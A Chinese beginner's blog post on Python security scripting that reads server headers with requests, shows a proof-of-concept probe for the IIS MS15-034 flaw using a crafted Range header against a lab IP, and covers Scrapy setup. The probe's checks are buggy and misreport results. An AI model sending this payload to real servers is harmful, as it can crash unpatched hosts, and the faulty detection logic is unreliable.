网安小白自学python脚本 day4

最新推荐文章于 2024-09-03 17:22:28 发布
最新推荐文章于 2024-09-03 17:22:28 发布
阅读量97 收藏
点赞数
文章标签: python 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43827691/article/details/128630956
版权
文章展示了如何使用Python的requests库获取HTTP服务器信息,包括发送OPTIONS和GET请求,以及解析响应头。接着,它演示了一个针对MS15-034漏洞的检测方法,通过检查服务器版本并构造特定payload。最后,文章简述了Scrapy在KaliLinux中的安装和基本用法,用于创建和管理网络爬虫项目。
摘要由CSDN通过智能技术生成 
# 迎风布阵
import requests
url = "http://www.baidu.com"

r = requests.options(url)
print(r)
print(r.headers)
print(r.headers["Connection"])

在这里插入图片描述options为请求类型,详细参考
https://blog.csdn.net/weixin_45943355/article/details/125223919
值得一提到是注意print(r.headers[“Connection”])的输出结果,体会用法。

获取http服务器信息

# 迎风布阵
import requests

url = "http://192.168.248.129/"
r = requests.get(url)
print(r.headers)
print("服务器中间件为:"+r.headers["Server"])

在这里插入图片描述获取服务器的信息都是从响应头中获取

漏洞检测工具

在这里插入图片描述
ms15-034 POC编写

import requests

url = "http://192.168.248.129"
r = requests.get(url)
# 检测当前版本是否为存在漏洞单版本
remote_server = r.headers['Server']
if remote_server.find("IIS/7.5") or remote_server("IIS/8.0"):
    # Host: stuff\r\nRange: bytes = 0 - 18446744073709551615\r\n\r\n
    # 以上为在网站找到的pyload代码
    # 将pyload写入到头中
    payload = {'Host': 'stuff', 'Range': 'bytes = 0 - 18446744073709551615'}
    r1 = requests.get(url, headers=payload)
    # 如果返回到文本中存在Requested Range Not Satisfiable,则证明可能存在漏洞
    if str(r1.content).find("Requested Range Not Satisfiable"):
        print(url + " exist vuln ms15-034")
    else:
        print(url + "not exist vuln ms15-034")
else:
    print("Server not a iis 7.5 or iil 8.0")

Scrapy介绍与安装

在这里插入图片描述在kali中安装,安装到bin下面
在这里插入图片描述输入scrapy
会出现可用参数
在这里插入图片描述创建项目
scrapy startproject <project_name> [project_dir]
scrapy startproject +项目名称+文件路径

进入路径下
在这里插入图片描述
会看到一下文件
items.py 设置要爬取的字段
pipelines.py 设置保存爬取内容
setting.py 设置文件,如User-Agent
上一层目录中的scrapy.cfg 用来部署最终完成的爬虫脚本
退出到第一层目录,输入scrapy genspider example example.com
后,spiders文件中才会出现一个爬虫的脚本框架
在这里插入图片描述
通过修改里面的内容以及配置文件才进行爬取。

迎风布阵x
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安小白自学python脚本 day1
qq_43827691的博客
01-05 113
无参数传递有参数传递通过params来传递参数用headers参数传递请求头的值。
网安小白自学python脚本 day2
qq_43827691的博客
01-05 122
在 requests 里,session对象是一个非常常用的对象,这个对象代表一次用户会话:从客户端浏览器连接服务器开始,到客户端浏览器与服务器断开。会话能让我们在跨请求时候保持某些参数,比如在同一个 Session 实例发出的所有请求之间保持 cookie。burp开启拦截,当放包后出现状态码200。打开burp设置好代理。
网安小白自学python脚本 day3
qq_43827691的博客
01-06 94
ps:临时遇到问题报错如下这里参考了大佬的教程,https://blog.csdn.net/m0_52370964/article/details/128144813已经解决。先win+r 输入regedit2.按照这个路径找:HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Internet Settings,找到ProxyEnable,然后双击打开,把输入框的1改成0确定即可继续结果为。
小白python自学_python小白学习之路
weixin_39686634的博客
12-04 57
为了坚持而坚持(这话说了自己不信)作为一个不懂编程的桌面,在技术的路上越走越远,严重到了找工作都很难的阶段,很心酸。。。作为一个干啥啥不行,吃啥啥有够,韩剧看不够,年纪又不小的我来说,在进步很难,不知路又走到哪就跑偏了,为了找到好工作而学习,至少希望可以升级做个小运维也是很满足的。没有野心的人,想在现在生存,比有野心的人还要艰难。知足没有常乐,知足只是在后退而已!网上学习python 对于我这样没...
Day1 小白自学python(2021/03/19)
FJ979086912的博客
03-19 79
跳过P1,P2。 毕竟我只是用来脚本而已,对那些什么发展前景并不感兴趣,且对于卖课的机构来说,肯定是要把自己卖的课给吹上天啦。没啥参考价值。 我的目的只有一个,那就是自己游戏脚本——给自己腾出学习和打游戏的时间。毕竟买的脚本真的很贵! 看P3,老师说到什么是操作系统, 老师好像没有说具体的定义,他只是举了个例子来说明操作系统是做什么的。其中还涉及到系统调用的概念。 我自己用比喻的方法联系一下。 操作系统就是一个工业园区,里面有很多小工厂。我想得到一个产品,于是向工业园区里的一个小工厂发送订单。小工厂得
自学Python Day_03
坏坏-5的博客
03-05 485
本篇主要讲述了Python擅长的领域,变量、常量赋值、注释、以及用户输入和if语句。
从零自学Python:day13
weixin_48706479的博客
07-27 110
Python3 编程第一步 今天又是混过去的一天 尝试一个斐波纳契数列。 斐波纳契数列,是数学家莱昂纳多斐波纳契以兔子繁殖为例子引出的一个数列 0、1、1、2、3、5、8、13、21、34、…… 斐波那契数列以如下被以递推的方法定义:F(1)=1,F(2)=1, F(n)=F(n - 1)+F(n - 2)(n ≥ 3,n ∈ N*) #!/usr/bin/python3 # Fibonacci series: 斐波纳契数列 # 两个元素的总和确定了下一个数 a, b = 0, 1 while b &
自学Python(准备) Day1
weixin_45901116的博客
03-28 150
# 自学Python(准备) Day1 一、一些基本概念 计算机: *① 具有功能性和可编程性,发展参照摩尔定律(计算机发展史上最重要的预测法则,CPU/GPU,内存,硬盘,电子产品价格等均遵循此定律); *② 程序设计式计算机可编程性的体现,深度应用计算机的手段,程序设计是一种交互的人造语言 *③ 程序编基本方法:IPO(Input输入,Process处理,Output输出) *④ 编程增强思...
从零自学Python:day05
weixin_48706479的博客
07-19 104
今天是为了解放舌头 Python3 解释器 解释器,是一种电脑程序,能够把高级编程语言一行一行直接转译运行。解释器不会一次把整个程序转译出来,只像一位“中间人”,每次运行程序时都要先转成另一种语言再作运行,因此解释器的程序运行速度比较缓慢。它每转译一行程序叙述就立刻运行,然后再转译下一行,再运行,如此不停地进行下去。 我的理解是一种起翻译作用的东西 在Window系统下你可以通过以下命令来设置Python的环境变量,假设你的Python安装在 C:\Python34 下: set path=%path%;C
Python-100-Days-master_by9jz_surrounded83s_catvk4_python_python
10-01
Python-100-Days-master_by9jz_surrounded83s_catvk4_python_python教程】是一个Python学习资源,由by9jz、surrounded83s和catvk4等作者共同创建,旨在帮助初学者通过每天一小时的学习,用100天的时间系统地掌握...
python print 换行_【自学Python】DAY 3 多功能打印——print()函数
weixin_39716088的博客
11-22 1410
自学Python DAY 3今天内容较难,建议收藏后多次查看目录print介绍print用法print的参数print换行源代码分享1.print的自我介绍print在英文中的意思是印刷,打印,刊载,用印刷体;在Python中的作用是打印输出,最常见,也是使用频率最高的一个函数以上是print的介绍,但是只说不做是不行的。print难理解的是参数(本文章的第2节)2.print用法(难度☆☆)格...
Python2.7自学笔记 Day1
weixin_45122258的博客
02-04 179
Python2.7自学笔记 Day1 学习python的目的? 学习python的目的是为了编ArcGIS脚本,处理地理信息数据。 为什么学习2.7版本? ArcGIS10.1自带python2.7版本 一、安装Python2.7.17 1.打开Python官网Python官网 2.依次点击download→windows,选择Latest Python 2 Release - Python 2...
【数据分析师自学系列——pythonpython实现自动挂号代码
weixin_42105460的博客
04-20 3904
通过 Charles 抓包分析了医院的 App 的请求,然后用 脚本模拟登录医院的 App 挂号,具体代码如下: import requests import json import time import datetime from dateutil.relativedelta import relativedelta # 登录获取session_id def login(username,password): url = "https://zyyy.zwjk.com/api/exec.ht
计算机毕业设计选题推荐-任务管理系统-项目任务分配系统-Java/Python项目实战
IT研究室的博客
09-03 558
随着信息化技术的迅猛发展,各类企业和组织越来越依赖于高效的任务管理系统以保证其日常运营的顺利进行。根据IDC(国际数据公司)发布的报告显示,全球企业在数字化转型上的投入已达数千亿美元,其中相当一部分资金用于提升企业内部的管理效率。任务管理系统作为企业信息化的重要组成部分,能有效帮助企业分配、监控和反馈任务,从而提高工作效率。然而,尽管市场上已有多种任务管理系统,它们在功能、用户体验和适用性上存在显著差异。
Python的socket库详细介绍
小仙女的博客
09-03 752
socket库是Python标准库的一部分,提供了底层的网络接口,可以用于实现各种网络协议的通信。在网络编程中,socket(套接字)是一种在网络设备之间通信的端点。Python的socket库使得网络编程变得简单且高效,能够处理TCP/IP、UDP等协议。
【扇贝编程】使用Selenium模拟浏览器获取动态内容笔记
最新发布
m0_73676887的博客
09-03 1401
文章目录selenium安装 selenium下载浏览器驱动获取数据处理数据查找一个元素查找所有符合条件的元素控制浏览器 selenium selenium是爬虫的好帮手, 可以控制你的浏览器,模仿人浏览网页,从而获取数据,自动操作等。 我们只要让 selenium 自动控制浏览器,实现爬取数据、自动抢票…… selenium要打开浏览器并控制它,占用的资源会更多,爬取数据的效率也会有所降低。 安装 selenium pip install selenium 下载浏览器驱动 根据你使用的浏览器(如 Chr
CUDA编程08 - 并行编程思维
GPU全栈博主-程序哥
09-02 1087
到目前为止,我们集中于学习并行编程的实用知识,包括CUDA编程接口特性、GPU架构、性能优化技术、并行模式和应用案例研究。在本章中,我们将讨论更为抽象的概念。我们将并行编程概括为一种思维过程,即设计或选择并行算法,并将一个实际问题分解基本的工作单元,这些工作单元可以由所选的算法高效地执行。具备强大思维技能的程序员不仅会分析问题,还会转变实际问题的结构:哪些部分本质上是串行的,哪些部分适合并行执行,以及将前者的部分转移到后者所涉及的一些权衡。
Python-办公自动化】批量修改EXCEL指定内容
2202_76035290的博客
08-29 3153
欢迎来到"花花 Show Python",一名热爱编程和分享知识的技术博主。在这里,我将与您一同探索Python的奥秘,分享编程技巧、项目实践和学习心得。无论您是编程新手还是资深开发者,都能在这里找到有价值的信息和灵感。我热衷于将复杂的技术概念以简单易懂的方式呈现给大家,让每个人都能享受到编程的乐趣。我相信,通过不断的学习和实践,我们都能够成为更好的开发者。如果您喜欢我的内容,别忘了点击关注哦!这样您就可以第一时间获取我的更新和分享。您的支持是我不断前进的动力。
小白自学python
03-27
当你作为一个小白自学Python时,以下是一些建议和步骤: 1. 学习编程基础知识:在开始学习Python之前,了解一些基本的编程概念和术语是很重要的。你可以学习一些基本的计算机科学概念,如变量、数据类型、条件语句、循环等。 2. 学习Python语法:Python是一种易于学习和理解的编程语言。你可以通过在线教程、视频教程或参考书籍来学习Python的语法规则和基本语句。掌握Python的基本语法是你进一步学习和开发的基础。 3. 练习编代码:通过实践来巩固所学的知识是非常重要的。尝试编一些简单的程序来解决问题,例如计算器、猜数字游戏等。这样可以帮助你熟悉Python的语法和逻辑。 4. 使用在线资源:互联网上有很多免费的资源可以帮助你学习Python。你可以参考一些优质的网站、博客、论坛和社区,如CSDN、Stack Overflow等。这些资源提供了大量的教程、示例代码和解答问题的平台。 5. 参与项目或实践:参与一些开源项目或实践项目可以帮助你更好地理解和应用Python。你可以加入一些开源社区,与其他开发者合作,共同开发项目。这样可以提高你的编程技能和经验。 6. 持续学习和提升:编程是一个不断学习和提升的过程。随着你的学习和实践,你会遇到更多的问题和挑战。不断学习新的知识,探索更深入的主题,参与更复杂的项目,可以帮助你不断提升自己的编程能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值